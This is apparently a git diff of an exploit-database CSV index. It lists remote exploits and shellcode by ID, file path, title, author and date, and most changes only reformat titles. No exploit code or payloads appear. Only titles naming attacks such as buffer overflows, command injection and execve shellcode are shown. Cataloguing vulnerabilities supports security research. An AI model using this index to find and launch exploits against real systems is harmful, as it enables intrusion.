18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0
|
||||
18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0
|
||||
|
@ -11817,7 +11819,7 @@ id,file,description,date,author,platform,type,port
|
|||
19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
|
||||
19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0
|
||||
19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc Exploit",1990-08-14,"Peter Shipley",solaris,remote,0
|
||||
19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH and LD_OPTIONS",1992-05-27,anonymous,solaris,remote,0
|
||||
19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit",1992-05-27,anonymous,solaris,remote,0
|
||||
19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0
|
||||
19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi' Exploit",1998-04-07,"J.A. Gutierrez",aix,remote,0
|
||||
19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow",1998-04-14,"Netstat Webmaster",linux,remote,0
|
||||
|
@ -11832,7 +11834,7 @@ id,file,description,date,author,platform,type,port
|
|||
19092,platforms/multiple/remote/19092.py,"MySQL - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0
|
||||
19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0
|
||||
19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0
|
||||
19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
|
||||
19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 / Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
|
||||
19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote,0
|
||||
19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
|
||||
19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0
|
||||
|
@ -11866,7 +11868,7 @@ id,file,description,date,author,platform,type,port
|
|||
19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)",2012-06-15,Metasploit,windows,remote,0
|
||||
19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (MS12-043) (Metasploit)",2012-06-16,Metasploit,windows,remote,0
|
||||
19193,platforms/multiple/remote/19193.txt,"Allaire Forums 2.0.4 - Getfile",1999-02-11,"Cameron Childress",multiple,remote,0
|
||||
19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP And FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0
|
||||
19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0
|
||||
19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client",1997-04-08,"Paul Ashton",windows,remote,0
|
||||
19208,platforms/windows/remote/19208.txt,"Microsoft Site Server Commerce Edition 3.0 alpha - AdSamples Sensitive Information",1999-05-11,"Andrey Kruchkov",windows,remote,0
|
||||
19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U FTP Server 2.5 - Buffer Overflow",1999-05-03,"Arne Vidstrom",linux,remote,0
|
||||
|
@ -11885,7 +11887,7 @@ id,file,description,date,author,platform,type,port
|
|||
19246,platforms/windows/remote/19246.pm,"Microsoft IIS 4.0 - Buffer Overflow (2)",1999-06-15,Stinko,windows,remote,0
|
||||
19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow (3)",1999-06-15,"eeye security",linux,remote,0
|
||||
19248,platforms/windows/remote/19248.c,"Microsoft IIS 4.0 - Buffer Overflow (4)",1999-06-15,"Greg Hoglund",windows,remote,0
|
||||
19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four and Zero Header Length",1999-06-16,badi,linux,remote,0
|
||||
19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four / Zero Header Length",1999-06-16,badi,linux,remote,0
|
||||
19253,platforms/linux/remote/19253.txt,"Debian 2.1 - httpd Exploit",1999-06-17,anonymous,linux,remote,0
|
||||
19266,platforms/windows/remote/19266.py,"EZHomeTech Ezserver 6.4 - Stack Overflow",2012-06-18,modpr0be,windows,remote,0
|
||||
19288,platforms/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0
|
||||
|
@ -11900,7 +11902,7 @@ id,file,description,date,author,platform,type,port
|
|||
19322,platforms/windows/remote/19322.rb,"Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote,0
|
||||
19327,platforms/solaris/remote/19327.c,"Sun Solaris 2.5.1 - rpc.statd rpc Call Relaying",1999-06-07,anonymous,solaris,remote,0
|
||||
19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 - login(1) Exploit",1996-12-04,anonymous,aix,remote,0
|
||||
19407,platforms/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - Login and Password Field Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0
|
||||
19407,platforms/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0
|
||||
19361,platforms/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 - Double Byte Code Page",1999-06-24,Microsoft,windows,remote,0
|
||||
19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 - Fasttrack Root Directory Listing",1999-06-07,"Jesús López de Aguileta",multiple,remote,0
|
||||
19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 - SP5B NDS Default Rights",1999-04-09,"Simple Nomad",netware,remote,0
|
||||
|
@ -11947,7 +11949,7 @@ id,file,description,date,author,platform,type,port
|
|||
19532,platforms/aix/remote/19532.pl,"IBM AIX 4.3.2 ftpd - Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0
|
||||
19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",windows,remote,0
|
||||
19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],hardware,remote,0
|
||||
19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit",1999-10-11,"Georgi Guninski",windows,remote,0
|
||||
19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - iFrame Exploit",1999-10-11,"Georgi Guninski",windows,remote,0
|
||||
19540,platforms/windows/remote/19540.txt,"t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",windows,remote,0
|
||||
19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog Exploit",1997-10-19,"Bryan Berg",php,remote,0
|
||||
19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 Exploit (1)",1998-03-16,Rootshell,hardware,remote,0
|
||||
|
@ -12097,7 +12099,7 @@ id,file,description,date,author,platform,type,port
|
|||
19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (2)",2000-05-16,L0pht,multiple,remote,0
|
||||
19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (3)",2000-05-16,L0pht,multiple,remote,0
|
||||
19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0
|
||||
19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default 'Username' and Password",2000-05-17,"rain forest puppy",windows,remote,0
|
||||
19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",windows,remote,0
|
||||
19924,platforms/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (1)",2000-05-16,duke,bsd,remote,0
|
||||
19926,platforms/linux/remote/19926.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (3)",2000-04-08,"Jim Paris",linux,remote,0
|
||||
19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 - Filetype",2000-05-13,http-equiv,windows,remote,0
|
||||
|
@ -12354,7 +12356,7 @@ id,file,description,date,author,platform,type,port
|
|||
20516,platforms/multiple/remote/20516.txt,"BEA Systems WebLogic Server 4.0 x/4.5 x/5.1 x - Double Dot Buffer Overflow",2000-12-19,peter.grundl,multiple,remote,0
|
||||
20519,platforms/multiple/remote/20519.c,"Check Point Software Firewall-1 4.1 SP2 - Fast Mode TCP Fragment",2000-12-14,"Thomas Lopatic",multiple,remote,0
|
||||
20522,platforms/cgi/remote/20522.txt,"Technote 2000/2001 - 'board' File Disclosure",2000-12-23,bt,cgi,remote,0
|
||||
20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution And File Disclosure",2000-12-27,Ksecurity,cgi,remote,0
|
||||
20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution and File Disclosure",2000-12-27,Ksecurity,cgi,remote,0
|
||||
20524,platforms/cgi/remote/20524.txt,"Brian Stanback bsguest.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0
|
||||
20525,platforms/cgi/remote/20525.txt,"Brian Stanback bslist.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0
|
||||
20527,platforms/cgi/remote/20527.txt,"Informix Webdriver 1.0 - Remote Administration Access",2000-12-30,isno,cgi,remote,0
|
||||
|
@ -12472,7 +12474,7 @@ id,file,description,date,author,platform,type,port
|
|||
20782,platforms/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 / OE 5.5 - XML Stylesheets Active Scripting",2001-04-20,"Georgi Guninski",windows,remote,0
|
||||
20791,platforms/unix/remote/20791.php,"Netscape Navigator 4.0.8 - 'about:' Domain Information Disclosure",2001-04-09,"Florian Wesch",unix,remote,0
|
||||
20793,platforms/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 - Relative Path Webroot Escaping",2001-04-23,joetesta,windows,remote,0
|
||||
20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0
|
||||
20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' / 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0
|
||||
20796,platforms/linux/remote/20796.rb,"Zabbix Server - Arbitrary Command Execution (Metasploit)",2012-08-27,Metasploit,linux,remote,0
|
||||
20797,platforms/multiple/remote/20797.txt,"Perl Web Server 0.x - Directory Traversal",2001-04-24,neme-dhc,multiple,remote,0
|
||||
20799,platforms/cgi/remote/20799.c,"PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (1)",2000-01-11,"Synnergy Networks",cgi,remote,0
|
||||
|
@ -12606,7 +12608,7 @@ id,file,description,date,author,platform,type,port
|
|||
21102,platforms/cgi/remote/21102.txt,"Power Up HTML 0.8033 Beta - Directory Traversal Arbitrary File Disclosure",2001-09-07,"Steve Shepherd",cgi,remote,0
|
||||
21104,platforms/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution",2001-09-08,"Alexey Sintsov",cgi,remote,0
|
||||
21109,platforms/windows/remote/21109.c,"EFTP 2.0.7 337 - Buffer Overflow Code Execution / Denial of Service",2001-09-12,byterage,windows,remote,0
|
||||
21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory and File Existence",2001-09-12,byterage,windows,remote,0
|
||||
21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory Existence / File Existence",2001-09-12,byterage,windows,remote,0
|
||||
21112,platforms/linux/remote/21112.php,"RedHat Linux 7.0 Apache - Remote 'Username' Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote,0
|
||||
21113,platforms/windows/remote/21113.txt,"Microsoft Index Server 2.0 - File Information / Full Path Disclosure",2001-09-14,"Syed Mohamed",windows,remote,0
|
||||
21115,platforms/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0
|
||||
|
@ -13266,7 +13268,7 @@ id,file,description,date,author,platform,type,port
|
|||
23243,platforms/windows/remote/23243.py,"Freefloat FTP Server - 'USER' Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0
|
||||
23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043)",2003-10-25,Adik,windows,remote,0
|
||||
23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass (1)",2003-11-28,"Bugtraq Security",multiple,remote,0
|
||||
23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0
|
||||
23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0
|
||||
23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0
|
||||
23270,platforms/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access",2003-10-21,"Marc Schoenefeld",windows,remote,0
|
||||
23271,platforms/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin - Cross-Site Scripting",2003-10-22,SecuriTeam,multiple,remote,0
|
||||
|
@ -13387,7 +13389,7 @@ id,file,description,date,author,platform,type,port
|
|||
23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal",2004-01-26,"Donato Ferrante",windows,remote,0
|
||||
23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0
|
||||
23605,platforms/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x - Error Page Cross-Site Scripting",2004-01-26,"César Fernández",solaris,remote,0
|
||||
23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0
|
||||
23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack / Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0
|
||||
23612,platforms/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0
|
||||
23632,platforms/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure",2004-02-02,"Zero X",windows,remote,0
|
||||
23643,platforms/windows/remote/23643.txt,"Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004)",2004-02-03,"Andreas Sandblad",windows,remote,0
|
||||
|
@ -13402,7 +13404,7 @@ id,file,description,date,author,platform,type,port
|
|||
23679,platforms/windows/remote/23679.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (2)",2004-02-10,"Cheng Peng Su",windows,remote,0
|
||||
23707,platforms/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",multiple,remote,0
|
||||
23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Buffer Overflow",2004-02-13,badpack3t,windows,remote,0
|
||||
23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help And Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0
|
||||
23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help and Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0
|
||||
23721,platforms/hardware/remote/23721.txt,"Linksys WAP55AG 1.0.7 - SNMP Community String Insecure Configuration",2004-02-18,"NN Poster",hardware,remote,0
|
||||
23728,platforms/linux/remote/23728.txt,"Metamail 2.7 - Multiple Buffer Overflow/Format String Handling Vulnerabilities",2004-02-18,"Ulf Harnhammar",linux,remote,0
|
||||
23730,platforms/windows/remote/23730.txt,"AOL Instant Messenger 4.x/5.x - Buddy Icon Predictable File Location",2004-02-19,"Michael Evanchik",windows,remote,0
|
||||
|
@ -13588,7 +13590,7 @@ id,file,description,date,author,platform,type,port
|
|||
24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)",2013-02-14,"Scott Bell",windows,remote,0
|
||||
24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit)",2013-02-14,Metasploit,windows,remote,0
|
||||
24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 - Download Execute",2013-02-20,g11tch,windows,remote,0
|
||||
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote,0
|
||||
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH / DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote,0
|
||||
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload (Metasploit)",2013-02-20,Metasploit,windows,remote,0
|
||||
24529,platforms/php/remote/24529.rb,"OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-20,Metasploit,php,remote,0
|
||||
24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)",2013-02-23,Metasploit,windows,remote,0
|
||||
|
@ -13815,7 +13817,7 @@ id,file,description,date,author,platform,type,port
|
|||
25608,platforms/hardware/remote/25608.rb,"Linksys WRT160N v2 - apply.cgi Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
|
||||
25609,platforms/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
|
||||
25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0
|
||||
25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0
|
||||
25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0
|
||||
25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0
|
||||
25621,platforms/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal",2005-05-05,dr_insane,windows,remote,0
|
||||
25624,platforms/unix/remote/25624.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (1)",2005-05-06,"Luca Ercoli",unix,remote,0
|
||||
|
@ -14403,7 +14405,7 @@ id,file,description,date,author,platform,type,port
|
|||
31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0
|
||||
31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0
|
||||
31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0
|
||||
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
|
||||
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
|
||||
31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe_mode' Security Bypass Exploit",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
|
||||
31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
|
||||
40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
|
||||
|
@ -14513,7 +14515,7 @@ id,file,description,date,author,platform,type,port
|
|||
31912,platforms/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",multiple,remote,0
|
||||
31918,platforms/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure",2008-06-15,"Luigi Auriemma",multiple,remote,0
|
||||
31920,platforms/multiple/remote/31920.txt,"Glub Tech Secure FTP 2.5.15 - 'LIST' Command Directory Traversal",2008-06-13,"Tan Chew Keong",multiple,remote,0
|
||||
31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' and 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote,0
|
||||
31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote,0
|
||||
31922,platforms/multiple/remote/31922.txt,"GlassFish Application Server - 'resourceNode/customResourceNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0
|
||||
31923,platforms/multiple/remote/31923.txt,"GlassFish Application Server - 'resourceNode/externalResourceNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0
|
||||
31924,platforms/multiple/remote/31924.txt,"GlassFish Application Server - 'resourceNode/jmsDestinationNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0
|
||||
|
@ -15016,7 +15018,7 @@ id,file,description,date,author,platform,type,port
|
|||
35005,platforms/windows/remote/35005.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0
|
||||
35006,platforms/windows/remote/35006.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0
|
||||
35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0
|
||||
35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0
|
||||
35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0
|
||||
35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 - WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",hardware,remote,0
|
||||
35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - 'tcp_test' Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0
|
||||
35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService - Arbitrary File Upload (Metasploit)",2014-10-21,Metasploit,windows,remote,0
|
||||
|
@ -15733,7 +15735,7 @@ id,file,description,date,author,platform,type,port
|
|||
41358,platforms/php/remote/41358.rb,"Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
|
||||
41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
|
||||
41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
|
||||
41443,platforms/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
|
||||
41443,platforms/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
|
||||
41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
|
||||
41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
|
||||
41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
|
||||
|
@ -15768,7 +15770,7 @@ id,file,description,date,author,platform,type,port
|
|||
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0
|
||||
41738,platforms/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
|
||||
41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
|
||||
41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
|
||||
41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret and Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
|
||||
41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0
|
||||
41775,platforms/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",windows,remote,0
|
||||
41808,platforms/hardware/remote/41808.txt,"Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow",2017-04-04,"Google Security Research",hardware,remote,0
|
||||
|
@ -15898,6 +15900,7 @@ id,file,description,date,author,platform,type,port
|
|||
42958,platforms/linux/remote/42958.py,"Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution",2017-08-08,"Jared Arave",linux,remote,0
|
||||
42964,platforms/lin_x86-64/remote/42964.rb,"Rancher Server - Docker Daemon Code Execution (Metasploit)",2017-10-09,Metasploit,lin_x86-64,remote,8080
|
||||
42965,platforms/multiple/remote/42965.rb,"OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)",2017-10-09,Metasploit,multiple,remote,2480
|
||||
42973,platforms/windows/remote/42973.py,"VX Search Enterprise 10.1.12 - Buffer Overflow",2017-10-09,"Revnic Vasile",windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
